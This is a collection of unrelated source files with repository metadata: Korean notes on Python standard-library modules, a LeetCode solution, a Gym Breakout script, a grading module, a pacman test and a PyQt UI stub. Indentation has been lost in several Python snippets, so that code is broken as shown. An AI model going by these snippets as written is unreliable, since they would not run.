# 'COMSPEC': 'C:\\Windows\\system32\\cmd.exe',
# 'CONDA_DEFAULT_ENV': 'base',
# 'CONDA_EXE': 'C:\\Users\\aimldl\\Anaconda3\\Scripts\\conda.exe',
# 'CONDA_PREFIX': 'C:\\Users\\aimldl\\Anaconda3',
# 'CONDA_PROMPT_MODIFIER': '(base) ',
# 'CONDA_PYTHON_EXE': 'C:\\Users\\aimldl\\Anaconda3\\python.exe',
# 'CONDA_SHLVL': '1',
# 'DRIVERDATA': 'C:\\Windows\\System32\\Drivers\\DriverData',
# 'FPS_BROWSER_APP_PROFILE_STRING': 'Internet Explorer',
# 'FPS_BROWSER_USER_PROFILE_STRING': 'Default',
# 'HOMEDRIVE': 'C:',
# 'HOMEPATH': '\\Users\\aimldl',
# 'LOCALAPPDATA': 'C:\\Users\\aimldl\\AppData\\Local',
# 'LOGONSERVER': '\\\\DESKTOP-HPVQJ6N',
# 'NUMBER_OF_PROCESSORS': '8',
# 'ONEDRIVE': 'C:\\Users\\aimldl\\OneDrive',
# 'ONEDRIVECONSUMER': 'C:\\Users\\aimldl\\OneDrive',
# 'OS': 'Windows_NT',
# 'PATH': 'C:\\Users\\aimldl\\Anaconda3;
# C:\\Users\\aimldl\\Anaconda3\\Library\\mingw-w64\\bin;
# C:\\Users\\aimldl\\Anaconda3\\Library\\usr\\bin;
# C:\\Users\\aimldl\\Anaconda3\\Library\\bin;
# C:\\Users\\aimldl\\Anaconda3\\Scripts;
# C:\\Users\\aimldl\\Anaconda3\\bin;
# C:\\Users\\aimldl\\Anaconda3\\condabin;
# C:\\Windows\\system32;
# C:\\Windows;
# C:\\Windows\\System32\\Wbem;
# C:\\Windows\\System32\\WindowsPowerShell\\v1.0;
# C:\\Windows\\System32\\OpenSSH;
# C:\\Program Files\\dotnet;
# C:\\Program Files\\Microsoft SQL Server\\130\\Tools\\Binn;
# C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn;
# C:\\Users\\aimldl\\AppData\\Local\\Microsoft\\WindowsApps;.',
# 'PATHEXT': '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC',
# 'PROCESSOR_ARCHITECTURE': 'AMD64',
# 'PROCESSOR_IDENTIFIER': 'Intel64 Family 6 Model 158 Stepping 9, GenuineIntel',
# 'PROCESSOR_LEVEL': '6',
# 'PROCESSOR_REVISION': '9e09',
# 'PROGRAMDATA': 'C:\\ProgramData',
# 'PROGRAMFILES': 'C:\\Program Files',
# 'PROGRAMFILES(X86)': 'C:\\Program Files (x86)',
# 'PROGRAMW6432': 'C:\\Program Files',
# 'PROMPT': '(base) $P$G',
# 'PSMODULEPATH': 'C:\\Program Files\\WindowsPowerShell\\Modules;
# C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules',
# 'PUBLIC': 'C:\\Users\\Public',
# 'SESSIONNAME': 'Console',
# 'SYSTEMDRIVE': 'C:',
# 'SYSTEMROOT': 'C:\\Windows',
# 'TEMP': 'C:\\Users\\aimldl\\AppData\\Local\\Temp',
# 'TMP': 'C:\\Users\\aimldl\\AppData\\Local\\Temp',
# 'USERDOMAIN': 'DESKTOP-HPVQJ6N',
# 'USERDOMAIN_ROAMINGPROFILE': 'DESKTOP-HPVQJ6N',
# 'USERNAME': 'aimldl',
# 'USERPROFILE': 'C:\\Users\\aimldl',
# 'WINDIR': 'C:\\Windows'})
#>>>
##################################
# os.chdir 디렉터리 위치 변경하기 #
##################################
os.chdir('C:\WINDOWS')
########################################
# os.getcwd 현재 디렉토리 위치 리턴 받기 #
########################################
os.getcwd()
# 'C:\\Users\\aimldl'
###################################
# os.system 시스템 명령어 호출하기 #
###################################
# 시스템 자체의 프로그램, 기타 명령어들을 파이썬에서 호출.
os.system('dir')
# C 드라이브의 볼륨에는 이름이 없습니다.
# 볼륨 일련 번호: E0EE-4D5E
#
# C:\Users\aimldl 디렉터리
#
#2019-07-13 토 오후 03:11 <DIR> .
#2019-07-13 토 오후 03:11 <DIR> ..
#2019-06-25 화 오후 10:09 <DIR> .anaconda
#2019-07-12 금 오후 01:30 <DIR> .android
#2019-07-12 금 오후 01:29 <DIR> .AndroidStudio3.4
#2019-06-26 수 오전 12:08 <DIR> .conda
#2019-06-25 화 오후 10:39 43 .condarc
#2019-06-25 화 오후 10:13 <DIR> .continuum
#2019-07-12 금 오후 12:41 <DIR> .dotnet
#2019-06-25 화 오후 10:11 <DIR> .ipython
#2019-06-26 수 오전 12:49 <DIR> .jupyter
#2019-06-25 화 오후 11:24 <DIR> .keras
#2019-06-25 화 오후 10:11 <DIR> .matplotlib
#2019-07-13 토 오후 04:37 380 .python_history
#2019-07-13 토 오전 12:21 <DIR> .spyder-py3
#2019-07-12 금 오전 08:45 <DIR> 3D Objects
#2019-07-07 일 오후 11:50 <DIR> Anaconda3
#2019-07-12 금 오전 08:45 <DIR> Contacts
#2019-07-13 토 오후 02:38 <DIR> Desktop
#2019-07-12 금 오후 01:05 <DIR> Documents
#2019-07-12 금 오후 05:02 <DIR> Downloads
#2019-07-07 일 오후 11:46 <DIR> Dropbox
#2019-06-25 화 오전 01:20 <DIR> Evernote
#2019-07-12 금 오전 08:45 <DIR> Favorites
#2019-07-12 금 오후 02:38 <DIR> iCloudDrive
#2019-07-12 금 오전 08:45 <DIR> Links
#2019-07-12 금 오전 08:45 <DIR> Music
#2019-07-12 금 오후 02:37 <DIR> OneDrive
#2019-07-12 금 오전 08:45 <DIR> Pictures
#2019-06-25 화 오후 10:35 <DIR> projects
#2019-07-12 금 오전 08:45 <DIR> Saved Games
#2019-07-12 금 오전 08:45 <DIR> Searches
#2019-07-13 토 오후 03:11 40 test.txt
#2019-07-12 금 오전 08:45 <DIR> Videos
# 3개 파일 463 바이트
# 31개 디렉터리 2,907,742,322,688 바이트 남음
#0
#>>>
#############################################
# os.popen 실행한 시스템 명령어의 결과값 받기 #
#############################################
# 시스템 명령어의 실행결과값을 읽기모드 형태의 파일 객체로 리턴한다.
f = os.popen('dir')
print( f )
#<os._wrap_close object at 0x0000021D5142FE48>
print( type(f.read() ))
#<class 'str'>
# 읽어드린 파일 객체의 내용을 보기
print( f.read() )
# C 드라이브의 볼륨에는 이름이 없습니다.
# 볼륨 일련 번호: E0EE-4D5E
#
# C:\Users\aimldl 디렉터리
#
#2019-07-13 토 오후 03:11 <DIR> .
#2019-07-13 토 오후 03:11 <DIR> ..
#2019-06-25 화 오후 10:09 <DIR> .anaconda
#2019-07-12 금 오후 01:30 <DIR> .android
#2019-07-12 금 오후 01:29 <DIR> .AndroidStudio3.4
#2019-06-26 수 오전 12:08 <DIR> .conda
#2019-06-25 화 오후 10:39 43 .condarc
#2019-06-25 화 오후 10:13 <DIR> .continuum
#2019-07-12 금 오후 12:41 <DIR> .dotnet
#2019-06-25 화 오후 10:11 <DIR> .ipython
#2019-06-26 수 오전 12:49 <DIR> .jupyter
#2019-06-25 화 오후 11:24 <DIR> .keras
#2019-06-25 화 오후 10:11 <DIR> .matplotlib
#2019-07-13 토 오후 04:37 380 .python_history
#2019-07-13 토 오전 12:21 <DIR> .spyder-py3
#2019-07-12 금 오전 08:45 <DIR> 3D Objects
#2019-07-07 일 오후 11:50 <DIR> Anaconda3
#2019-07-12 금 오전 08:45 <DIR> Contacts
#2019-07-13 토 오후 02:38 <DIR> Desktop
#2019-07-12 금 오후 01:05 <DIR> Documents
#2019-07-12 금 오후 05:02 <DIR> Downloads
#2019-07-07 일 오후 11:46 <DIR> Dropbox
#2019-06-25 화 오전 01:20 <DIR> Evernote
#2019-07-12 금 오전 08:45 <DIR> Favorites
#2019-07-12 금 오후 02:38 <DIR> iCloudDrive
#2019-07-12 금 오전 08:45 <DIR> Links
#2019-07-12 금 오전 08:45 <DIR> Music
#2019-07-12 금 오후 02:37 <DIR> OneDrive
#2019-07-12 금 오전 08:45 <DIR> Pictures
#2019-06-25 화 오후 10:35 <DIR> projects
#2019-07-12 금 오전 08:45 <DIR> Saved Games
#2019-07-12 금 오전 08:45 <DIR> Searches
#2019-07-13 토 오후 03:11 40 test.txt
#2019-07-12 금 오전 08:45 <DIR> Videos
# 3개 파일 463 바이트
# 31개 디렉터리 2,907,739,869,184 바이트 남음
#%% 기타 유용한 OS 관련 함수
os.mkdir( directory_name ) # 디렉토리 생성
os.rmdir( directory_name ) # 디렉토리 삭제. 단, 비어있어야 함.
os.unlink( file_name ) # rm, 파일을 지운다.
os.rename(src,dst) # 파일명 변경
#%% shutil
# shutil로 파일을 복사할 수 있다.
# shutil — High-level file operations
# https://docs.python.org/3/library/shutil.html
######################################
# shutil.copy(src, dst) 파일 복사하기 #
######################################
import shutil
shutil.copy('src.txt','dst.txt')
# Q: Why not os.copy? or os.cpy(src,dst)
#%% glob
# glob 특정 디렉토리에 있는 파일이름을 모두 알아야 할 때...
# 파일명의 전체 리스트를 만들거나,
# *,? 등의 메타 문자를 써서 원하는 파일만 읽을 수도 있다.
# glob( pathname ) 디렉터리에 있는 파일들의 리스트 만들기
import glob
glob.glob('C:/Python/q*')
# []
# 다른 예
# (왜냐하면 위의 예는 Win10의 Anaconda Prompt에서 동작하지 않았다.)
os.getcwd()
# 'C:\\Users\\aimldl'
os.system('dir')
# dir의 결과는 위쪽 os.system('dir')의 실행결과를 참고할 것.
glob.glob('D*')
# ['Desktop', 'Documents', 'Downloads', 'Dropbox']
#%% tempfile
# tempfile은 파일을 임시로 만들어서 사용할 때 유용하다.
#####################
# tempfile.mktemp() #
#####################
# 중복되지 않는 임시 파일의 이름을 무작위로 만들어서 리턴한다.
import tempfile
filename = tempfile.mktemp()
filename
#'C:\\Users\\aimldl\\AppData\\Local\\Temp\\tmpt7qbpmb7'
############################
# tempfile.TemporaryFile() #
############################
# 임시 저장 공간으로 사용될 파일 객체를 리턴
# 이 파일은 기본적으로 바이너리 쓰기 모드 (wb)를 갖는다.
# f.close()가 호출되면 이 파일 객체는 자동으로 사라진다.
import tempfile
f = tempfile.TemporaryFile()
f.close()
# Q: 솔직히 용도를 잘 모르겠음.
#%% time
# time모듈은 시간과 관련된 유용한 함수가 많다.
##############
# time.sleep #
##############
# 책에는 마직막인데 제일 앞으로 당김.
# 주로 루프 안에서 일정 시간 간격을 두고 루프를 실행할 때 쓰인다.
# sleep1.py
import time
for i in range(10):
print( i )
time.sleep(1) # 1 sec
#############
# time.time #
#############
# UTC (Universal Time Coordinate, 세계표준시)로 현재 시간을 실수 형태로 리턴한다.
# 기준: 1970년 1월 1일 0시 0분 0초
# 기준시간이후로 지난 시간을 초단위로 리턴함.
import time
time.time()
#1563005221.5239825
##################
# time.localtime #
##################
# 연도,월,일,시,분,초의 형태로 바꿔서 리턴한다.
# time.time()에 의해 반환되는 실수값을 이용
import time
# Option 1
time.localtime()
# time.struct_time(tm_year=2019, tm_mon=7, tm_mday=13, tm_hour=17, tm_min=9, tm_sec=7, tm_wday=5, tm_yday=194, tm_isdst=0)
# Option 2
time.localtime( time.time() )
################
# time.asctime #
################
# time.localtime에서 반환된 튜플형태의 입력을...
# 날짜와 시간을 알아보기 쉬운 형태로 리턴한다.
import time
# Option 1
time.asctime()
# 'Sat Jul 13 17:11:22 2019'
# Option 2
local_time = time.localtime()
time.asctime( local_time )
# 'Sat Jul 13 17:11:22 2019'
# Option 3
time_time = time.time()
local_time = time.localtime( time_time )
time.asctime( local_time )
# 'Sat Jul 13 17:11:22 2019'
##############
# time.ctime #
##############
# Current Time
# time.asctime()와 같은 포맷으로 시간을 리턴한다.
# 단, 현재 시간만 리턴한다는 것이 다르다.
import time
time.ctime()
# 'Sat Jul 13 17:13:27 2019'
#################
# time.strftime #
#################
# time.strftime( format_code, time.locatime() )
# format_code를 지정할 수 있다.
# 예
import time
time.strftime( '%x', time.localtime() )
#'07/13/19'
time.strftime( '%c', time.localtime() )
#'Sat Jul 13 17:16:54 2019'
#%% format code for time.strftime
# TODO: 관련 링크를 넣을 것.
# 책의 p.259에도 있음.
#%% calendar
# calendar는 파이썬에서 달력을 볼 수 있게 한다.
#############################
# calendar.calendar( year ) #
#############################
# 입력한 연도의 전체 달력을 볼 수 있다.
import calendar
print( calendar.calendar(2019) )
# 2019
#
# January February March
#Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 1 2 3 1 2 3
# 7 8 9 10 11 12 13 4 5 6 7 8 9 10 4 5 6 7 8 9 10
#14 15 16 17 18 19 20 11 12 13 14 15 16 17 11 12 13 14 15 16 17
#21 22 23 24 25 26 27 18 19 20 21 22 23 24 18 19 20 21 22 23 24
#28 29 30 31 25 26 27 28 25 26 27 28 29 30 31
#
# April May June
#Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 7 1 2 3 4 5 1 2
# 8 9 10 11 12 13 14 6 7 8 9 10 11 12 3 4 5 6 7 8 9
#15 16 17 18 19 20 21 13 14 15 16 17 18 19 10 11 12 13 14 15 16
#22 23 24 25 26 27 28 20 21 22 23 24 25 26 17 18 19 20 21 22 23
#29 30 27 28 29 30 31 24 25 26 27 28 29 30
#
# July August September
#Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 7 1 2 3 4 1
# 8 9 10 11 12 13 14 5 6 7 8 9 10 11 2 3 4 5 6 7 8
#15 16 17 18 19 20 21 12 13 14 15 16 17 18 9 10 11 12 13 14 15
#22 23 24 25 26 27 28 19 20 21 22 23 24 25 16 17 18 19 20 21 22
#29 30 31 26 27 28 29 30 31 23 24 25 26 27 28 29
# 30
#
# October November December
#Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 1 2 3 1
# 7 8 9 10 11 12 13 4 5 6 7 8 9 10 2 3 4 5 6 7 8
#14 15 16 17 18 19 20 11 12 13 14 15 16 17 9 10 11 12 13 14 15
#21 22 23 24 25 26 27 18 19 20 21 22 23 24 16 17 18 19 20 21 22
#28 29 30 31 25 26 27 28 29 30 23 24 25 26 27 28 29
# 30 31
##########################
# calendar.prcal( year ) #
##########################
# calendar.calendar( year )와 동일한 결과
# Q: 그러면 왜 만들어 놓았나?
import calendar
calendar.prcal( 2019 )
###################################
# calendar.prmonth( year, month ) #
###################################
calendar.prmonth( 2019,7 )
# July 2019
#Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 7
# 8 9 10 11 12 13 14
#15 16 17 18 19 20 21
#22 23 24 25 26 27 28
#29 30 31
########################################
# calendar.weekday( year, month, day ) #
########################################
# 요일정보,
# 0 월요일
# 1 화요일
# [...]
# 5 토요일
# 6 일요일
calendar.weekday( 2019,7,13 )
# 5
# 토요일
# 07을 입력하면 에러
calendar.weekday( 2019,07,13 )
# SyntaxError: invalid token
#######################
# calendar.monthrange #
#######################
# monthrange는 입력한 년월에 대해
# (1일의 요일, 몇일까지 있는지 )
# 를 튜플로 리턴한다.
calendar.monthrange( 2015, 12 )
# (1, 31)
# 2015년 12월의
# 1의 의미: 화요일, 1일은 1, 즉 화요일이다.
# 31의 의미: 12월은 31일까지이다.
# prmonth로 결과를 확인해보면...
calendar.prmonth(2015, 12)
# December 2015
#Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6
# 7 8 9 10 11 12 13
#14 15 16 17 18 19 20
#21 22 23 24 25 26 27
#28 29 30 31
#다른 예
calendar.monthrange( 2019, 7 )
# (0, 31)
# 2019년 7월 1일은 월요일이고,
# 이 달은 31일까지 있다.
# 2019년 7월도 확인해보면...
calendar.prmonth(2019, 7)
# July 2019
#Mo Tu We Th Fr Sa Su
# 1 2 3 4 5 6 7
# 8 9 10 11 12 13 14
#15 16 17 18 19 20 21
#22 23 24 25 26 27 28
#29 30 31
#%% random & randint
# random으로 난수 (규칙이 없는 임의의 수)를 발생시킨다.
# 주의: 난수이므로 출력값은 매번 바뀐다.
import random
random.random() # 0.0~1.0 사이의 실수
# 0.3234451917255078
random.randint(1,10) # 1~10 사이의 정수
# 4
random.randint(1,55) # 1~55 사이의 정수
# 43
# random모듈을 이용해서 재미있는 함수를 만들어본다.
# 리스트의 요소 중에서 무작위로 하나를 선택하여 꺼낸 다음 그 값을 리턴한다.
# pop을 하므로 요소는 하나씩 사라진다.
# 이 스크립트는 별도의 파일로 저장해서 실행해야 한다.
# $ python random_pop.py
# 출력값의 한 예는 다음과 같다.
#5
#4
#2
#1
#3
#################
# random_pop.py #
#################
import random
def random_pop( data ):
number = random.randint( 0, len(data)-1 )
return data.pop( number )
if __name__ == "__main__":
data = [1,2,3,4,5]
while data: print( random_pop(data) )
# 위의 함수는 random.choice함수를 사용해서 아래처럼 조금 더 직관적으로 만들 수 있다.
##################
# random_pop2.py #
##################
def random_pop2( data ):
number = random.choice( data )
data.remove( number )
return number
if __name__ == "__main__":
data = [1,2,3,4,5]
while data: print( random_pop2(data) )
##################
# random.shuffle #
##################
# 리스트의 항목을 무작위로 섞을 때 쓸 수 있다.
import random
data = [1,2,3,4,5]
random.shuffle( data )
data
# [3, 2, 4, 1, 5]
#%% webbrowser
# webbrowser로 자신의 시스템에서 사용하는 기본 웹 브라우저를 자동실행 할 수 있다.
import webbrowser
webbrowser.open('http://www.google.com')
# open_new함수는 이미 웹브라우저가 실행된 상태이더라도
# 새로운 창으로 해당 주소가 열리도록 한다.
webbrowser.open_new('http://www.google.com')
| 31.869775 | 400 | 0.508904 |
54c00deca98864734a9ea2fb1379fa401e4950fd
| 616 |
py
|
Python
|
leetcode/543-Diameter-of-Binary-Tree/dfs_recursive_me.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
leetcode/543-Diameter-of-Binary-Tree/dfs_recursive_me.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
leetcode/543-Diameter-of-Binary-Tree/dfs_recursive_me.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def diameterOfBinaryTree(self, root: TreeNode) -> int:
_, res = self.max_depth(root)
return res
def max_depth(self, node: TreeNode) -> int:
if node is None:
return -1, 0
left_depth, left_max = self.max_depth(node.left)
right_depth, right_max = self.max_depth(node.right)
return max(left_depth, right_depth) + 1, max(left_depth + right_depth + 2, left_max, right_max)
| 30.8 | 103 | 0.616883 |
b7b5a0f33ba89b330993f718c5f06e0741a89e7f
| 1,527 |
py
|
Python
|
tensorflow/basic-rl/tutorial8/gym/breakout/breakout_random.py
|
gopala-kr/ds-notebooks
|
bc35430ecdd851f2ceab8f2437eec4d77cb59423
|
[
"MIT"
] | 1 |
2019-05-10T09:16:23.000Z
|
2019-05-10T09:16:23.000Z
|
tensorflow/basic-rl/tutorial8/gym/breakout/breakout_random.py
|
gopala-kr/ds-notebooks
|
bc35430ecdd851f2ceab8f2437eec4d77cb59423
|
[
"MIT"
] | null | null | null |
tensorflow/basic-rl/tutorial8/gym/breakout/breakout_random.py
|
gopala-kr/ds-notebooks
|
bc35430ecdd851f2ceab8f2437eec4d77cb59423
|
[
"MIT"
] | 1 |
2019-05-10T09:17:28.000Z
|
2019-05-10T09:17:28.000Z
|
'''
Random Breakout AI player
@author: Victor Mayoral Vilches <[email protected]>
'''
import gym
import numpy
import random
import pandas
if __name__ == '__main__':
env = gym.make('Breakout-v0')
env.monitor.start('/tmp/breakout-experiment-1', force=True)
# video_callable=lambda count: count % 10 == 0)
goal_average_steps = 195
max_number_of_steps = 200
last_time_steps = numpy.ndarray(0)
n_bins = 8
n_bins_angle = 10
number_of_features = env.observation_space.shape[0]
last_time_steps = numpy.ndarray(0)
action_attack = [False]*43
action_attack[0] = True
action_right = [False]*43
action_right[10] = True
action_left = [False]*43
action_left[11] = True
actions = [action_attack, action_left, action_right]
done = False
observation = env.reset()
for i_episode in xrange(30):
if done:
observation = env.reset()
for t in xrange(max_number_of_steps):
env.render()
# Execute the action and get feedback
observation, reward, done, info = env.step(env.action_space.sample())
if done:
break
l = last_time_steps.tolist()
l.sort()
print("Overall score: {:0.2f}".format(last_time_steps.mean()))
print("Best 100 score: {:0.2f}".format(reduce(lambda x, y: x + y, l[-100:]) / len(l[-100:])))
env.monitor.close()
# gym.upload('/tmp/cartpole-experiment-1', algorithm_id='vmayoral simple Q-learning', api_key='your-key')
| 27.267857 | 109 | 0.639162 |
4deeed8aa1253076ca937b9a354bcdeba019bc51
| 462 |
py
|
Python
|
task_5/create_example.py
|
christopher-besch/bwinf39
|
e5394b37894a56608312057d179029d8a5df98fd
|
[
"MIT"
] | 1 |
2021-01-04T15:16:44.000Z
|
2021-01-04T15:16:44.000Z
|
task_5/create_example.py
|
christopher-besch/bwinf39
|
e5394b37894a56608312057d179029d8a5df98fd
|
[
"MIT"
] | null | null | null |
task_5/create_example.py
|
christopher-besch/bwinf39
|
e5394b37894a56608312057d179029d8a5df98fd
|
[
"MIT"
] | null | null | null |
from random import choice
def main():
amount_students = 1000
amount_wishes = 100
print(amount_students)
for student_number in range(1, amount_students + 1):
wishes = []
for _ in range(amount_wishes):
while str(wish := choice(range(1, amount_students + 1))) in wishes:
pass
wishes.append(str(wish))
print(" ".join(wishes))
if __name__ == "__main__":
main()
| 24.315789 | 80 | 0.569264 |
150538a9741d119e14f2e15d72281b72c44210bf
| 74 |
py
|
Python
|
python/coursera_python/WESLEYAN/week3/COURSERA/week_3/t_6.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/coursera_python/WESLEYAN/week3/COURSERA/week_3/t_6.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/coursera_python/WESLEYAN/week3/COURSERA/week_3/t_6.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
infilename = input()
outfilename = input()
print(infilename,outfilename)
| 14.8 | 29 | 0.77027 |
4215537d3e39a92788e9a43f55a4d74635db25bf
| 2,281 |
py
|
Python
|
bewerte/note.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
bewerte/note.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
bewerte/note.py
|
jupfi81/NotenManager
|
ee96a41088bb898c025aed7b3c904741cb71d004
|
[
"MIT"
] | null | null | null |
""" Modul, dass die Gesamtnote fuer einen Schueler bestimmt """
import configparser
from statistics import mean
def endnote(schueler, klasserc):
""" Berechnet die Gesamtnote (klappt nur, wenn es nur schriftlich un mündlich gibt"""
# Schritt 1: loesche in allen Listen die leeren Noten
for art in schueler:
noten = []
for val in schueler[art]:
if val:
noten.append(val)
schueler[art] = noten
config = configparser.ConfigParser()
config.read('~/Projekte/KlassenManager/config/defaultrc')
config.read(klasserc)
noten = dict()
wichtungs_summe = dict()
for kategorie in config['basics']['Kategorien'].split(','):
noten.update({kategorie.strip() : []})
wichtungs_summe.update({kategorie.strip() : 0})
for art in schueler:
if schueler[art]:
if config['bewertungsart'][art] == "e":
noten[config['arten'][art]] += [float(config['wichtung'][art])
* val for val in schueler[art]]
wichtungs_summe[config['arten'][art]] += (float(config['wichtung'][art])
* len(schueler[art]))
elif config['bewertungsart'][art] == 'g':
noten[config['arten'][art]].append(float(config['wichtung'][art])
* mean(schueler[art]))
wichtungs_summe[config['arten'][art]] += float(config['wichtung'][art])
if wichtungs_summe['muendlich']:
muendlich = sum(noten['muendlich']) / wichtungs_summe['muendlich']
else:
print("note:", schueler)
muendlich = 100
print("Etwas mit der Wichtung dern muendlichen Noten stimmt nicht")
if sum(noten['schriftlich']) == 0:
schriftlich = 0
wichtungs_summe['schriftlich'] = 0
note = muendlich
else:
schriftlich = sum(noten['schriftlich']) / wichtungs_summe['schriftlich']
note = ((float(config['wichtung']['schriftlich']) * schriftlich
+ float(config['wichtung']['muendlich']) * muendlich) /
(float(config['wichtung']['schriftlich']) + float(config['wichtung']['muendlich'])))
return round(note, 2)
| 43.865385 | 100 | 0.569049 |
42b1be2d3c4471a7cca6c9fb32ef9512a827e432
| 366 |
py
|
Python
|
pacman-termux/test/pacman/tests/overwrite-files-match-negated.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/overwrite-files-match-negated.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/overwrite-files-match-negated.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Install a package with an existing file matching a negated --overwrite pattern"
p = pmpkg("dummy")
p.files = ["foobar"]
self.addpkg(p)
self.filesystem = ["foobar*"]
self.args = "-U --overwrite=foobar --overwrite=!foo* %s" % p.filename()
self.addrule("!PACMAN_RETCODE=0")
self.addrule("!PKG_EXIST=dummy")
self.addrule("!FILE_MODIFIED=foobar")
| 26.142857 | 99 | 0.713115 |
676013cbf4f52ac7c30faf41992f7941e996adac
| 1,559 |
py
|
Python
|
intro-vietstack/tools/release-programs.py
|
vietstack/vietstack.github.io
|
6571001dc72751ee89115d9ed520c2b9ca2f2b86
|
[
"MIT"
] | 1 |
2016-11-29T09:35:50.000Z
|
2016-11-29T09:35:50.000Z
|
intro-vietstack/tools/release-programs.py
|
vietstack/vietstack.github.io
|
6571001dc72751ee89115d9ed520c2b9ca2f2b86
|
[
"MIT"
] | 8 |
2016-09-23T01:25:12.000Z
|
2016-11-14T04:02:16.000Z
|
intro-vietstack/tools/release-programs.py
|
vietstack/vietstack.github.io
|
6571001dc72751ee89115d9ed520c2b9ca2f2b86
|
[
"MIT"
] | 14 |
2016-09-22T01:46:57.000Z
|
2019-09-05T05:42:11.000Z
|
#!/usr/bin/python
import os
import sys
import argparse
import yaml
releases = [
'austin', 'bexar', 'cactus',
'diablo', 'essex', 'folsom',
'grizzly', 'havana', 'icehouse', 'juno', 'kilo'
]
release_dict = dict((y,x) for x,y in (enumerate(releases)))
def parse_args():
p = argparse.ArgumentParser()
p.add_argument('--markdown', '-m',
action='store_true')
p.add_argument('program_yaml')
p.add_argument('release')
return p.parse_args()
def main():
args = parse_args()
with open(args.program_yaml) as fd:
programs = yaml.load(fd)
target = release_dict[args.release]
selected = []
for program,info in programs.items():
info['program'] = program
for project in info['projects']:
if 'integrated-since' in project:
break
else:
continue
integrated = release_dict[project['integrated-since']]
if integrated <= target:
selected.append(info)
if args.markdown:
for program in sorted(selected, key=lambda x: x['codename']):
print '- [%s][] (%s)' % (
program['codename'],
program['program'])
print
for program in sorted(selected, key=lambda x: x['codename']):
print '[%s]: %s' % (
program['codename'],
program['url'])
else:
for program in sorted(selected, key=lambda x: x['codename']):
print program['codename']
if __name__ == '__main__':
main()
| 23.984615 | 69 | 0.556767 |
c02847c1d491cc1ce610e1dc490f15e02e0b2bde
| 2,984 |
py
|
Python
|
src/Sephrasto/UI/CharakterFreieFert.py
|
Ilaris-Tools/Sephrasto
|
8574a5b45da8ebfa5f69a775066fd3136da1c718
|
[
"MIT"
] | 1 |
2022-02-02T16:15:59.000Z
|
2022-02-02T16:15:59.000Z
|
src/Sephrasto/UI/CharakterFreieFert.py
|
Ilaris-Tools/Sephrasto
|
8574a5b45da8ebfa5f69a775066fd3136da1c718
|
[
"MIT"
] | 1 |
2022-01-14T11:04:19.000Z
|
2022-01-14T11:04:19.000Z
|
src/Sephrasto/UI/CharakterFreieFert.py
|
lukruh/Sephrasto
|
8574a5b45da8ebfa5f69a775066fd3136da1c718
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'CharakterFreieFert.ui'
#
# Created by: PyQt5 UI code generator 5.15.6
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(872, 460)
self.gridLayout_3 = QtWidgets.QGridLayout(Form)
self.gridLayout_3.setContentsMargins(20, 20, 20, 20)
self.gridLayout_3.setObjectName("gridLayout_3")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setVerticalSpacing(20)
self.gridLayout.setObjectName("gridLayout")
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 0, 0, 1, 1)
self.label = QtWidgets.QLabel(Form)
